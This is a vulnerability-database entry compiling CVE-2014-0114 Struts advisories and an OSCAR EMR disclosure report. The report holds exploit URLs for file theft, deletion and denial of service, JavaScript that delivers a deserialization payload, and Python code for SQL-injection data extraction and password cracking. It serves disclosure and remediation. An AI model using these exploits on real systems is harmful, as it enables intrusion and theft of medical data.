VARIoT IoT vulnerabilities database
| VAR-201404-0288 | CVE-2014-0114 | TERASOLUNA Server Framework for Java(Web) vulnerable to ClassLoader manipulation |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
Apache Commons BeanUtils, as distributed in lib/commons-beanutils-1.8.0.jar in Apache Struts 1.x through 1.3.10 and in other products requiring commons-beanutils through 1.9.2, does not suppress the class property, which allows remote attackers to "manipulate" the ClassLoader and execute arbitrary code via the class parameter, as demonstrated by the passing of this parameter to the getClass method of the ActionForm object in Struts 1.
TERASOLUNA Server Framework for Java(Web), provided by NTT DATA Corporation, is a software framework for creating Java web applications. It bundles Apache Struts 1.2.9, which contains a vulnerability where the ClassLoader may be manipulated (CVE-2014-0114), so the vulnerability affects TERASOLUNA Server Framework for Java(Web) as well. On a server where the product is running, a remote attacker may steal information or execute arbitrary code.
Description:
Red Hat JBoss Fuse, based on Apache ServiceMix, provides a small-footprint,
flexible, open source enterprise service bus and integration platform. This
update fixes the Struts 1 ClassLoader manipulation flaw (CVE-2014-0114).
Refer to the readme.txt file included with the patch files for
installation instructions.
Solution:
The References section of this erratum contains a download link (you must
log in to download the update).
_______________________________________________________________________
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0114
http://advisories.mageia.org/MGASA-2014-0219.html
_______________________________________________________________________
Updated Packages:
Mandriva Enterprise Server 5:
2341ea3fd6c92a10ab4c0be7ef5ca9da mes5/i586/struts-1.2.9-6.1mdvmes5.2.i586.rpm
8d911347cc4fdb08383a2d6ad21860e6 mes5/i586/struts-javadoc-1.2.9-6.1mdvmes5.2.i586.rpm
fc1e7ac540a1d4c923cf773769c976b2 mes5/i586/struts-manual-1.2.9-6.1mdvmes5.2.i586.rpm
3304297e4b88aae688e8edcdd11bf478 mes5/i586/struts-webapps-tomcat5-1.2.9-6.1mdvmes5.2.i586.rpm
b508c226756fcb2a82a8b5e2e84af466 mes5/SRPMS/struts-1.2.9-6.1mdvmes5.2.src.rpm
Mandriva Enterprise Server 5/X86_64:
7e2abd47c0862fa5010ee686d76d2353 mes5/x86_64/struts-1.2.9-6.1mdvmes5.2.x86_64.rpm
96dd8e36bf4b46577498ad8616dce319 mes5/x86_64/struts-javadoc-1.2.9-6.1mdvmes5.2.x86_64.rpm
37a1b595d7f2f73bdff8d13bcb70e0a6 mes5/x86_64/struts-manual-1.2.9-6.1mdvmes5.2.x86_64.rpm
8c298a1e1e9e8ad81acb0166b2f18109 mes5/x86_64/struts-webapps-tomcat5-1.2.9-6.1mdvmes5.2.x86_64.rpm
b508c226756fcb2a82a8b5e2e84af466 mes5/SRPMS/struts-1.2.9-6.1mdvmes5.2.src.rpm
Mandriva Business Server 1/X86_64:
1e1b9440affefd05d5fe0c4860fdcd9b mbs1/x86_64/struts-1.3.10-3.1.mbs1.noarch.rpm
5ae68b0b7f991676f67562a51dd956a7 mbs1/x86_64/struts-javadoc-1.3.10-3.1.mbs1.noarch.rpm
f135f96b6d2121b157b7a62afd449ea6 mbs1/SRPMS/struts-1.3.10-3.1.mbs1.src.rpm
_______________________________________________________________________
To upgrade automatically use MandrivaUpdate or urpmi. The verification
of md5 checksums and GPG signatures is performed automatically for you.
All packages are signed by Mandriva for security. You can obtain the
GPG public key of the Mandriva Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/en/support/security/advisories/
If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
_______________________________________________________________________
Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team
<security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)
iD8DBQFTdeNbmqjQ0CJFipgRAo5XAJ4oaaS6iRfHSPHEO3og+Se4kWkdfgCgrhMb
HUtc9GTxbEwte2/fTU7bJ5M=
=5Ewj
-----END PGP SIGNATURE-----
Title: Multiple vulnerabilities in OSCAR EMR
Product: OSCAR EMR
Vendor: Oscar McMaster
Tested version: 15.21beta361
Remediation status: Unknown
Reported by: Brian D. Hysell
-----
Product Description:
"OSCAR is open-source Electronic Medical Record (EMR) software that
was first developed at McMaster University by Dr. David Chan. It is
continuously enriched by contributions from OSCAR users and the
Charter OSCAR Service Providers that support them. OSCAR has been
certified by OntarioMD, and verified as IHE compliant, achievements
made possible by the creation and success of OSCAR EMR's ISO
13485:2003 certified Quality Management System."
-----
Timeline:
29 Mar 2016 - Vendor contacted
29 Mar 2016 - Vendor responded
29 Apr 2016 - Vendor contacted for permission to share redacted report
with third party
02 May 2016 - Vendor responded
17 Jan 2017 - Lead developer contacted (no response)
01 Jul 2018 - Vendor and lead developer contacted for follow-up,
informed of intended 15 Aug disclosure (no response)
12 Aug 2018 - Alternate email address attempted for lead developer (no response)
15 Aug 2018 - Vulnerabilities publicly disclosed
-----
Contents:
This report uses OVE identifiers: http://www.openwall.com/ove/
OVE-20160329-0001: Database backup disclosure or denial of service via
insecure dependency
OVE-20160329-0003: Remote code execution via unsafe object deserialization
OVE-20160329-0004: Stored cross-site scripting (XSS) vulnerability in
security report interface
OVE-20160329-0007: SQL injection
OVE-20160329-0008: Path traversal
OVE-20160329-0002: Insecure direct object reference in document manager
OVE-20160329-0005: Denial of service via resource exhaustion
OVE-20160329-0006: Insecure password storage
OVE-20160329-0009: Cross-site request forgery
-----
Issue details:
=== OVE-20160329-0001: Database backup disclosure or denial of service
via insecure dependency ===
OSCAR uses a version of Apache Struts, 1.2.7, which is vulnerable to
CVE-2014-0114.
An authenticated user can issue the following request (the request itself
is accepted with different or omitted cookie headers):
/oscar/login.do?class.classLoader.resources.dirContext.docBase=/var/lib/tomcat7/webapps/OscarDocument/oscar_mcmaster
This repoints the web application's document base at the directory that
holds OSCAR's documents, so the user can then fetch them directly (using a
valid session cookie), e.g., /oscar/OscarBackup.sql.gz
An unauthenticated attacker is prevented from doing likewise by the
"LoginFilter" servlet filter, but can still carry out a denial-of-service
attack that blocks all access to the application until Tomcat is restarted,
by issuing a request like the following:
/oscar/login.do?class.classLoader.resources.dirContext.docBase=invalid
=== OVE-20160329-0003: Remote code execution via unsafe object
deserialization ===
TraceabilityReportProcessor deserializes user-provided data, allowing
remote code execution given the presence of known-vulnerable libraries
in the classpath such as ROME 1.0. This functionality is only
available to administrators but can be exploited via XSS
(OVE-20160329-0004) or CSRF (OVE-20160329-0009) using a payload
generated with ysoserial.
In the tested configuration PMmodule/GenericIntake/ImportForm.jsp is
inaccessible due to the following exception,
"org.springframework.beans.factory.NoSuchBeanDefinitionException: No
bean named 'oscarSecurityManager' is defined", but were it to be
accessible, it would be vulnerable as well.
=== OVE-20160329-0004: Stored cross-site scripting (XSS) vulnerability
in security report interface ===
logReport.jsp, in general, does not escape data it outputs to the
page; in particular, on line 283, prop.getProperty("contentId") is
printed unescaped. As a result, if an attacker includes Javascript in
his or her username during a login attempt, it will be executed if an
administrator views the Security Log Report for that timeframe. The
text printed in the "Keyword" column is cut off at 80 characters, but
that is more than enough to load an externally-hosted script, such as
the following script exploiting the deserialization RCE
OVE-20160329-0003:
// Decode the base64 text of the ysoserial payload (elided on this page)
var decodedBase64 =
atob("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");
// Copy the decoded string byte-for-byte into a typed array so it can be
// uploaded as a binary file rather than as text
var binaryArray = new Uint8Array(new ArrayBuffer(decodedBase64.length));
for(var i = 0; i < binaryArray.length; i++) {
binaryArray[i] = decodedBase64.charCodeAt(i);
}
var payload = new Blob([binaryArray], {type: "application/x-gzip"});
// Build the same multipart form the report-generation page would submit
var formData = new FormData();
formData.append("file", payload);
formData.append("submit", "Generate");
// Post it from the administrator's browser, so it is sent with the
// administrator's session cookie; the server then deserializes the upload
var xhr = new XMLHttpRequest();
xhr.open("POST", "/oscar/admin/GenerateTraceabilityReportAction.do");
xhr.send(formData);
XSS was not a focus of this test; other confirmed or likely XSS
vulnerabilities are:
* Reflected XSS through the errormsg parameter in loginfailed.jsp
* Reflected XSS through the signatureRequestId parameter in tabletSignature.jsp
* Reflected XSS through the noteId parameter, line 1562 in
CaseManagementViewAction (untested)
* Reflected XSS through the pdfName parameter when an exception has
been thrown, line 1174 in ManageDocumentAction (untested)
* Reflected XSS through the pharmaName and pharmaFax parameters, line
149 in FrmCustomedPDFServlet (untested)
* Reflected XSS through the id and followupValue parameters, line 81
in EctAddShortMeasurementAction (untested)
=== OVE-20160329-0007: SQL injection ===
On line 239 of oscarMDS/PatientSearch.jsp, the orderby parameter is
concatenated into an SQL statement rather than parameterized; likewise
the content parameter on lines 217, 223, and 229 of
admin/logReport.jsp. In both cases these errors result in error-based
SQL injection vulnerabilities; the former allows authenticated users
with access to oscarMDS/PatientSearch.jsp to access information beyond
their privilege levels while the latter is accessible only to
administrators.
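The ORDER BY case above is worth a worked example because it is the one place a parameterized query does not help: a placeholder can bind a value, not an identifier, so the fix is an allowlist of sortable columns. The following is an added example, not OSCAR code; the table and column names (patients, app_secrets, last_name, api_key) are invented stand-ins for the PatientSearch.jsp query, and SQLite stands in for the application's database, so the error trigger (abs() of the smallest 64-bit integer) is SQLite-specific.

```python
"""ORDER BY injection and its fix (OVE-20160329-0007).

Added example, not OSCAR code.  The schema, rows and column names below are
constructed for the demo and are not OSCAR's data model.  A column name cannot
be bound as a query parameter, so the fix is an allowlist of sortable columns.
"""
import sqlite3

SCHEMA = """
CREATE TABLE patients (id INTEGER PRIMARY KEY, last_name TEXT, first_name TEXT);
INSERT INTO patients VALUES (1, 'Chen', 'Wei'), (2, 'Adams', 'Joan'), (3, 'Baker', 'Tom');
CREATE TABLE app_secrets (name TEXT, value TEXT);
INSERT INTO app_secrets VALUES ('api_key', '7f1a');
"""

SORTABLE_COLUMNS = {"id", "last_name", "first_name"}


def build_demo_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def search_patients_unsafe(conn, orderby: str) -> list:
    """The vulnerable pattern: the sort expression is concatenated into the SQL text."""
    return conn.execute("SELECT id, last_name FROM patients ORDER BY " + orderby).fetchall()


def is_safe_orderby(orderby: str, direction: str) -> bool:
    """Identifiers are checked against an allowlist; nothing else reaches the SQL."""
    return orderby in SORTABLE_COLUMNS and direction.upper() in ("ASC", "DESC")


def search_patients_safe(conn, orderby: str, direction: str = "ASC") -> list:
    if not is_safe_orderby(orderby, direction):
        raise ValueError(f"unsupported sort: {orderby!r} {direction!r}")
    return conn.execute(
        f"SELECT id, last_name FROM patients ORDER BY {orderby} {direction.upper()}"
    ).fetchall()


def error_oracle(conn, condition_sql: str) -> bool:
    """Error-based extraction through the unsafe sort parameter.

    abs() of the smallest 64-bit integer makes SQLite fail with 'integer
    overflow'.  The ELSE branch only runs when the attacker's condition is
    false, and it is tied to the id column so it is evaluated per row rather
    than hoisted as a constant.  The application only has to behave
    differently on a database error (stack trace, HTTP 500) for this to leak.
    """
    payload = (f"CASE WHEN ({condition_sql}) THEN last_name "
               f"ELSE abs(-9223372036854775807 - id) END")
    try:
        search_patients_unsafe(conn, payload)
        return True
    except sqlite3.Error:
        return False


def extract_secret(conn, length: int, alphabet: str = "0123456789abcdef") -> str:
    """Recover app_secrets.value one character at a time via the oracle."""
    recovered = ""
    for pos in range(1, length + 1):
        for ch in alphabet:
            cond = (f"(SELECT substr(value, {pos}, 1) FROM app_secrets "
                    f"WHERE name = 'api_key') = '{ch}'")
            if error_oracle(conn, cond):
                recovered += ch
                break
    return recovered


if __name__ == "__main__":
    db = build_demo_db()
    print("leaked via unsafe ORDER BY:", extract_secret(db, 4))
    print("safe query:", search_patients_safe(db, "last_name"))
    print("payload accepted by allowlist?",
          is_safe_orderby("last_name, abs(-9223372036854775807 - id)", "ASC"))
```

The same allowlist approach applies to the `content` parameter in logReport.jsp if it is ever used as an identifier; where it is a value, an ordinary bound parameter is the fix.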
=== OVE-20160329-0008: Path traversal ===
ImportLogDownloadAction reads and outputs an arbitrary absolute file
path provided by the user; DelImageAction deletes a user-specified
filename without accounting for the possibility of relative path
traversal (i.e., the inclusion of "../" in the filename).
Any authenticated user can exploit the former issue to steal files
from the system, e.g.,
/oscar/form/importLogDownload.do?importlog=/var/lib/tomcat7/webapps/OscarDocument/oscar_mcmaster/OscarBackup.sql.gz
An authenticated user with access to eforms can delete files writable
by the Tomcat user, e.g.,
/oscar/eform/deleteImage.do?filename=../../../../oscar/index.jsp
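Both handlers lack the same check: resolve the requested name against a fixed base directory and refuse anything that lands outside it. The following added example (not OSCAR code) implements that check and runs the report's two payload shapes against a throw-away directory tree. The directory layout under webapps/oscar is invented for the demo, and POSIX path semantics are assumed.

```python
"""Containment check for user-supplied file names (OVE-20160329-0008).

Added example, not OSCAR code.  Directory names are constructed for the demo.
"""
import os
import tempfile


class PathTraversalError(ValueError):
    """Raised when a requested path would escape the permitted directory."""


def resolve_within(base_dir: str, user_path: str) -> str:
    """Return the canonical path of user_path inside base_dir, or raise.

    - Absolute paths are refused outright (the importLogDownload case, where
      any absolute path was read back to the user).
    - Relative paths are joined to base_dir and canonicalised with realpath,
      so '..' segments and symlinks are resolved before the containment test
      (the deleteImage case).  The base directory itself is never a target.
    """
    if not user_path or os.path.isabs(user_path):
        raise PathTraversalError(f"absolute or empty path refused: {user_path!r}")
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, user_path))
    if candidate == base or os.path.commonpath([base, candidate]) != base:
        raise PathTraversalError(f"{user_path!r} resolves outside {base_dir!r}")
    return candidate


def delete_image(base_dir: str, filename: str) -> None:
    """A deleteImage.do-style handler with the containment check before unlink."""
    os.unlink(resolve_within(base_dir, filename))


def demo() -> dict:
    """Try traversal payloads against a temporary tree; returns what happened."""
    with tempfile.TemporaryDirectory() as tmp:
        base = os.path.join(tmp, "webapps", "oscar", "eform", "images")  # assumed layout
        os.makedirs(base)
        victim = os.path.join(tmp, "webapps", "oscar", "index.jsp")
        for path in (victim, os.path.join(base, "logo.png")):
            open(path, "w").close()

        outcomes = {}
        for name in ("logo.png", "sub/../logo.png",
                     "../../../../oscar/index.jsp", "/etc/passwd", "."):
            try:
                resolve_within(base, name)
                outcomes[name] = "allowed"
            except PathTraversalError:
                outcomes[name] = "rejected"

        # Two levels up from the images directory is the webapp root, so this
        # is the report's attack on index.jsp in miniature; it must fail.
        try:
            delete_image(base, "../../index.jsp")
        except PathTraversalError:
            pass
        outcomes["index.jsp survives"] = os.path.exists(victim)

        # A legitimate delete inside the base directory still works.
        delete_image(base, "logo.png")
        outcomes["logo.png deleted"] = not os.path.exists(os.path.join(base, "logo.png"))
        return outcomes


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key!r}: {value}")
```

realpath resolves symlinks as well as "..", which matters for the delete case: a symlink planted inside the images directory would otherwise be a way back out.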
=== OVE-20160329-0002: Insecure direct object reference in document manager ===
ManageDocumentAction.display() does not check the permissions
associated with the requested document ID (doc_no) before providing it
to the requesting user. Given
/oscar/dms/ManageDocument.do?method=display&doc_no=X&providerNo=Y, a
user with access to the document management interface can view
arbitrary documents by incrementing or decrementing X, regardless of
whether they have been marked private.
=== OVE-20160329-0005: Denial of service via resource exhaustion ===
uploadSignature.jsp, which is accessible to and operable by
unauthenticated users, saves uploaded files to a temporary directory
but never deletes them. An attacker can upload many junk files and
eventually consume all disk space available to the /tmp directory,
impeding access to the application depending on the functionality in
question and the partition layout of the host system (the effects are
crippling and pervasive if /tmp is on the same partition as /; they
are much less so if /tmp is on a separate partition).
=== OVE-20160329-0006: Insecure password storage ===
Passwords are stored as SHA-1 hashes; unless unusually complex,
passwords stored in that manner are typically easily recoverable with
a tool such as oclHashcat. In OSCAR each hash is stored as a string of
decimal numbers, rather than hexadecimal or raw bytes. This somewhat
non-traditional representation adds a bit of programming work to the
cracking process, but does not represent a major impediment to attack.
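The "bit of programming work" is small enough to show. The following is an added example, not OSCAR code: the report only says the hash is stored as a string of decimal numbers, so the encoder below assumes the common Java idiom of appending each signed digest byte (-128..127) to a string with no separator. Under that assumption a cracker can either re-encode every candidate the same way and compare strings, or split the stored string back into its 20 bytes (occasionally with a few alternative readings) and hand the hex digests to a standard SHA-1 cracker.

```python
"""Working with decimal-encoded SHA-1 password hashes (OVE-20160329-0006).

Added example, not OSCAR code.  The encoding is an assumption: signed decimal
byte values concatenated without separators, as a Java loop appending each
byte of MessageDigest output to a StringBuilder would produce.
"""
import hashlib
from functools import lru_cache


def decimal_sha1(password: str) -> str:
    """Assumed stored form: each digest byte as a signed decimal, concatenated."""
    digest = hashlib.sha1(password.encode("utf-8")).digest()
    return "".join(str(b - 256 if b > 127 else b) for b in digest)


def crack(stored: str, wordlist):
    """Dictionary attack that never needs to parse the stored form at all."""
    for candidate in wordlist:
        if decimal_sha1(candidate) == stored:
            return candidate
    return None


def parse_decimal_digest(stored: str, n_bytes: int = 20) -> list:
    """Every way to split the string into n_bytes signed decimal byte values.

    A token is an optional '-' followed by 1..3 digits with no leading zero
    (Java's Integer.toString never emits one), valued -128..127, never '-0'.
    The whole string must be consumed.  Returns each reading as raw bytes.
    """
    @lru_cache(maxsize=None)
    def rec(pos: int, left: int) -> tuple:
        if left == 0:
            return ((),) if pos == len(stored) else ()
        neg = pos < len(stored) and stored[pos] == "-"
        start = pos + 1 if neg else pos
        found = []
        for width in (1, 2, 3):
            token = stored[start:start + width]
            if len(token) < width or not token.isdigit() or (width > 1 and token[0] == "0"):
                break
            value = int(token)
            if value > (128 if neg else 127) or (neg and value == 0):
                break
            for rest in rec(start + width, left - 1):
                found.append(((-value if neg else value),) + rest)
        return tuple(found)

    return [bytes(v & 0xFF for v in reading) for reading in rec(0, n_bytes)]


if __name__ == "__main__":
    stored = decimal_sha1("password")
    print("stored form:", stored)
    print("wordlist hit:", crack(stored, ["letmein", "password", "welcome1"]))
    for digest in parse_decimal_digest(stored):
        print("hex reading for hashcat -m 100:", digest.hex())
```

Either route works because SHA-1 over the bare password is unsalted and fast; the encoding changes nothing about the cost of guessing. The remedy is a deliberately slow, salted password hash, not a different serialization of SHA-1.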
=== OVE-20160329-0009: Cross-site request forgery ===
The application lacks protection against cross-site request forgery
attacks. A CSRF attack could be used against an administrator to
exploit the deserialization RCE in a manner similar to the example
provided with OVE-20160329-0004.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All Commons BeanUtils users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot -v ">=dev-java/commons-beanutils-1.9.2"
References
==========
[ 1 ] CVE-2014-0114
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0114
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
https://security.gentoo.org/glsa/201607-09
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2016 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=====================================================================
Red Hat Security Advisory
Synopsis: Important: struts security update
Advisory ID: RHSA-2014:0500-01
Product: Red Hat Satellite
Advisory URL: https://rhn.redhat.com/errata/RHSA-2014-0500.html
Issue date: 2014-05-14
CVE Names: CVE-2014-0114
=====================================================================
1. Summary:
Updated struts packages that fix one security issue are now available for
Red Hat Network Satellite 5.4 and 5.5, and Red Hat Satellite 5.6.
The Red Hat Security Response Team has rated this update as having
Important security impact. A Common Vulnerability Scoring System (CVSS)
base score, which gives a detailed severity rating, is available from the
CVE link in the References section.
2. Relevant releases/architectures:
Red Hat Satellite 5.4 (RHEL v.6) - noarch
Red Hat Satellite 5.5 (RHEL v.6) - noarch
Red Hat Satellite 5.6 (RHEL v.6) - noarch
3. Description:
Red Hat Satellite is a systems management tool for Linux-based
infrastructures. It allows for provisioning, monitoring, and remote
management of multiple Linux deployments with a single, centralized tool.
The Struts 1 ActionForm object allowed access to the class parameter, which
maps directly to the getClass() method; a remote attacker could use this to
manipulate the ClassLoader used by an application server running Struts 1.
This could lead to remote code execution under certain conditions.
(CVE-2014-0114)
All Satellite users are advised to upgrade to these updated packages, which
contain a backported patch to correct this issue. For this update to take
effect, the tomcat6 service must be restarted ("service tomcat6 restart").
4. Solution:
Before applying this update, make sure all previously released errata
relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to
use the Red Hat Network to apply this update are available at
https://access.redhat.com/site/articles/11258
5. Bugs fixed (https://bugzilla.redhat.com/):
1091938 - CVE-2014-0114 Apache Struts 1: Class Loader manipulation via request parameters
6. Package List:
Red Hat Satellite 5.4 (RHEL v.6):
Source:
struts-1.3.10-6.ep5.el6.src.rpm
noarch:
struts-1.3.10-6.ep5.el6.noarch.rpm
struts-core-1.3.10-6.ep5.el6.noarch.rpm
struts-extras-1.3.10-6.ep5.el6.noarch.rpm
struts-taglib-1.3.10-6.ep5.el6.noarch.rpm
struts-tiles-1.3.10-6.ep5.el6.noarch.rpm
Red Hat Satellite 5.5 (RHEL v.6):
Source:
struts-1.3.10-6.ep5.el6.src.rpm
noarch:
struts-1.3.10-6.ep5.el6.noarch.rpm
struts-core-1.3.10-6.ep5.el6.noarch.rpm
struts-extras-1.3.10-6.ep5.el6.noarch.rpm
struts-taglib-1.3.10-6.ep5.el6.noarch.rpm
struts-tiles-1.3.10-6.ep5.el6.noarch.rpm
Red Hat Satellite 5.6 (RHEL v.6):
Source:
struts-1.3.10-6.ep5.el6.src.rpm
noarch:
struts-1.3.10-6.ep5.el6.noarch.rpm
struts-core-1.3.10-6.ep5.el6.noarch.rpm
struts-extras-1.3.10-6.ep5.el6.noarch.rpm
struts-taglib-1.3.10-6.ep5.el6.noarch.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/#package
7. References:
https://www.redhat.com/security/data/cve/CVE-2014-0114.html
https://access.redhat.com/security/updates/classification/#important
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2014 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.4 (GNU/Linux)
iD8DBQFTc7+TXlSAg2UNWIIRAmptAJ9n47yYBOA5OA5jE3gLpsRx20tKagCfWNc8
M3/iYEVhVrBlugdrBQzYI+U=
=k5DC
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
Note: the current version of the following document is available here:
https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c05324755
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c05324755
Version: 1
HPSBGN03669 rev.1 - HPE SiteScope, Local Elevation of Privilege, Remote
Denial of Service, Arbitrary Code Execution and Cross-Site Request Forgery
NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.
Release Date: 2016-11-04
Last Updated: 2016-11-04
Potential Security Impact: Local: Elevation of Privilege; Remote: Arbitrary
Code Execution, Cross-Site Request Forgery (CSRF), Denial of Service (DoS)
Source: Hewlett Packard Enterprise, Product Security Response Team
VULNERABILITY SUMMARY
Potential vulnerabilities have been identified in HPE SiteScope. The
vulnerabilities could be exploited to allow local elevation of privilege and
exploited remotely to allow denial of service, arbitrary code execution,
cross-site request forgery.
References:
- CVE-2014-0114 - Apache Struts, execution of arbitrary code
- CVE-2016-0763 - Apache Tomcat, denial of service (DoS)
- CVE-2014-0107 - Apache XML Xalan, bypass expected restrictions
- CVE-2015-3253 - Apache Groovy, execution of arbitrary code
- CVE-2015-5652 - Python, elevation of privilege
- CVE-2013-6429 - Spring Framework, cross-site request forgery
- CVE-2014-0050 - Apache Commons FileUpload, denial of service (DoS)
- PSRT110264
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
- HP SiteScope Monitors Software Series 11.2x - 11.32IP1
BACKGROUND
CVSS Base Metrics
=================
Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector
CVE-2013-6429
6.5 CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:L
6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
CVE-2014-0050
8.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CVE-2014-0107
8.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CVE-2014-0114
6.8 CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CVE-2015-3253
7.1 CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L
7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CVE-2015-5652
8.6 CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
7.2 (AV:L/AC:L/Au:N/C:C/I:C/A:C)
CVE-2016-0763
6.3 CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L
6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P)
Information on CVSS is documented in
HPE Customer Notice HPSN-2008-002 here:
https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c01345499
RESOLUTION
HPE has provided a resolution via an update to HPE SiteScope. Details on the
update and each vulnerability are in the KM articles below.
**Note:** The resolution for each vulnerability listed is to upgrade to
SiteScope 11.32IP2 or an even more recent version of SiteScope if available.
The SiteScope update can be can found in the personal zone in "my updates" in
HPE Software Support Online: <https://softwaresupport.hpe.com>.
* Apache Commons FileUpload: KM02550251 (CVE-2014-0050):
+ <https://softwaresupport.hpe.com/group/softwaresupport/search-result/-/facetsearch/document/KM02550251>
* Apache Struts: KM02553983 (CVE-2014-0114):
+ <https://softwaresupport.hpe.com/group/softwaresupport/search-result/-/facetsearch/document/KM02553983>
* Apache Tomcat: KM02553990 (CVE-2016-0763):
+ <https://softwaresupport.hpe.com/group/softwaresupport/search-result/-/facetsearch/document/KM02553990>
* Apache XML Xalan: KM02553991 (CVE-2014-0107):
+ <https://softwaresupport.hpe.com/group/softwaresupport/search-result/-/facetsearch/document/KM02553991>
* Apache Groovy: KM02553992 (CVE-2015-3253):
+ <https://softwaresupport.hpe.com/group/softwaresupport/search-result/-/facetsearch/document/KM02553992>
* Python: KM02553997 (CVE-2015-5652):
+ <https://softwaresupport.hpe.com/group/softwaresupport/search-result/-/facetsearch/document/KM02553997>
* Spring Framework: KM02553998 (CVE-2013-6429):
+ <https://softwaresupport.hpe.com/group/softwaresupport/search-result/-/facetsearch/document/KM02553998>
HISTORY
Version:1 (rev.1) - 4 November 2016 Initial release
Third Party Security Patches: Third party security patches that are to be
installed on systems running Hewlett Packard Enterprise (HPE) software
products should be applied in accordance with the customer's patch management
policy.
Support: For issues about implementing the recommendations of this Security
Bulletin, contact normal HPE Services support channel. For other issues about
the content of this Security Bulletin, send e-mail to security-alert@hpe.com.
Report: To report a potential security vulnerability for any HPE supported
product:
Web form: https://www.hpe.com/info/report-security-vulnerability
Email: security-alert@hpe.com
Subscribe: To initiate a subscription to receive future HPE Security Bulletin
alerts via Email: http://www.hpe.com/support/Subscriber_Choice
Security Bulletin Archive: A list of recently released Security Bulletins is
available here: http://www.hpe.com/support/Security_Bulletin_Archive
Software Product Category: The Software Product Category is represented in
the title by the two characters following HPSB.
3C = 3COM
3P = 3rd Party Software
GN = HPE General Software
HF = HPE Hardware and Firmware
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PV = ProCurve
ST = Storage Software
UX = HP-UX
Copyright 2016 Hewlett Packard Enterprise
Hewlett Packard Enterprise shall not be liable for technical or editorial
errors or omissions contained herein. The information provided is provided
"as is" without warranty of any kind. To the extent permitted by law, neither
HP or its affiliates, subcontractors or suppliers will be liable for
incidental,special or consequential damages including downtime cost; lost
profits; damages relating to the procurement of substitute products or
services; or damages for loss of data, or software restoration. The
information in this document is subject to change without notice. Hewlett
Packard Enterprise and the names of Hewlett Packard Enterprise products
referenced herein are trademarks of Hewlett Packard Enterprise in the United
States and other countries. Other product and company names mentioned herein
may be trademarks of their respective owners.
References: CVE-2014-0114, SSRT101566
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
Mitigation information for the Apache Struts vulnerability (CVE-2014-0114) is
available at the following location:
http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Protect-your-Struts1-applications/ba-p/6463188#.U2J7xeaSxro
Japanese information is available at the following location:
http://www.hp.com/jp/icewall_patchaccess
Note: The HP IceWall product is only available in Japan.
Hewlett-Packard Company shall not be liable for technical or editorial errors
or omissions contained herein.
Thanks to the efforts of Alvaro Munoz and the HP Fortify team, the
Apache Struts project team can recommend a first mitigation that is
relatively simple to apply. It involves the introduction of a generic
Servlet filter, adding the possibility to blacklist unacceptable request
parameters based on regular expressions. Please see the corresponding HP
Fortify blog entry [2] for detailed instructions. Based
on this information, the Apache Struts project team recommends to apply
the mitigation advice *immediately* for all Struts 1 based applications.
Struts 1 had its End-Of-Life announced more than one year ago [3].
However, in a cross-project effort the Struts team is looking for a
correction or an improved mitigation path. Please stay tuned for further
information regarding a solution.
This is a cross-list posting. If you have questions regarding this
report, please direct them to security@struts.apache.org only.
[1] http://struts.apache.org/release/2.3.x/docs/s2-021.html
[2]
